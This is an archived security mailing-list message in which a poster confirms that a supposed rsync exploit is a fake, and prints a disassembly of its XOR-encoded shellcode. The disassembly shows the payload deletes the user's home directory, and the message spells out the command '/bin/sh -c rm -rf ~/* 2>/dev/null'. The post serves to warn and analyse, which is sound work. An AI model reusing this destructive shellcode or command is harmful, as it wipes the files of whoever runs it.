| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <40B7D37A.8050508@thievco.com> From: BlueBoar at thievco.com (Blue Boar) Subject: new rsync :) exploit rsync-too-open dkey wrote: > "nice mail"...but if somebody wants to use it, check the shellcode first...i > think it deletes all your files in your home dir. i'm not sure, maybe > somebody else can check it... Yes. seg000:00000000 ; Segment type: Pure code seg000:00000000 seg000 segment byte public 'CODE' use32 seg000:00000000 assume cs:seg000 seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing seg000:00000000 jmp short loc_12 seg000:00000002 seg000:00000002 ; ??????????????? S U B R O U T I N E ??????????????????????????????????????? seg000:00000002 seg000:00000002 seg000:00000002 sub_2 proc near ; CODE XREF: sub_2+10.p seg000:00000002 pop esi ; ESI = addr of decode section seg000:00000003 xor ecx, ecx ; ECX = 0 seg000:00000005 mov cl, 75 ; loop 75 times seg000:00000007 mov al, 255 ; XOR value start seg000:00000009 seg000:00000009 decode_loop: ; CODE XREF: sub_2+C.j seg000:00000009 xor [esi], al ; XOR current byte in decode section with AL seg000:0000000B dec al ; AL = AL - 1 seg000:0000000D inc esi ; next byte seg000:0000000E loop decode_loop seg000:00000010 jmp short decoded seg000:00000012 ; --------------------------------------------------------------------------- seg000:00000012 seg000:00000012 loc_12: ; CODE XREF: seg000:00000000.j seg000:00000012 call sub_2 ; push addr of decode section seg000:00000017 seg000:00000017 decoded: ; CODE XREF: sub_2+E.j seg000:00000017 call loc_41 ; push addr of "\bin\sh" seg000:00000017 ; --------------------------------------------------------------------------- seg000:0000001C aBinSh db '/bin/sh',0 seg000:00000024 aSh db 'sh',0 seg000:00000027 aC db '-c',0 seg000:0000002A aRmRf2DevNull db 'rm -rf ~/* 2>/dev/null',0 seg000:00000041 ; --------------------------------------------------------------------------- seg000:00000041 seg000:00000041 loc_41: ; CODE XREF: sub_2+15.p seg000:00000041 pop ebp ; EBP = addr of "\bin\sh" seg000:00000042 xor eax, eax ; EAX = 0 seg000:00000042 sub_2 endp seg000:00000042 seg000:00000044 push eax ; 0 seg000:00000045 lea ebx, [ebp+0Eh] seg000:00000048 push ebx ; "'rm -rf ~/* 2>/dev/null" seg000:00000049 lea ebx, [ebp+0Bh] seg000:0000004C push ebx ; "-c" seg000:0000004D lea ebx, [ebp+8] seg000:00000050 push ebx ; "sh" seg000:00000051 mov ebx, ebp ; "/bin/sh" seg000:00000053 mov ecx, esp seg000:00000055 xor edx, edx ; EDX = 0 seg000:00000057 mov al, 0Bh seg000:00000059 int 80h ; LINUX - sys_execve seg000:0000005B mov ebx, eax ; EBX = result seg000:0000005D xor eax, eax seg000:0000005F inc eax ; exit (1) seg000:00000060 int 80h ; LINUX - sys_exit seg000:00000060 seg000 ends seg000:00000060 end AKA "/bin/sh -c rm -rf ~/* 2>/dev/null" BB
Powered by blists - more mailing lists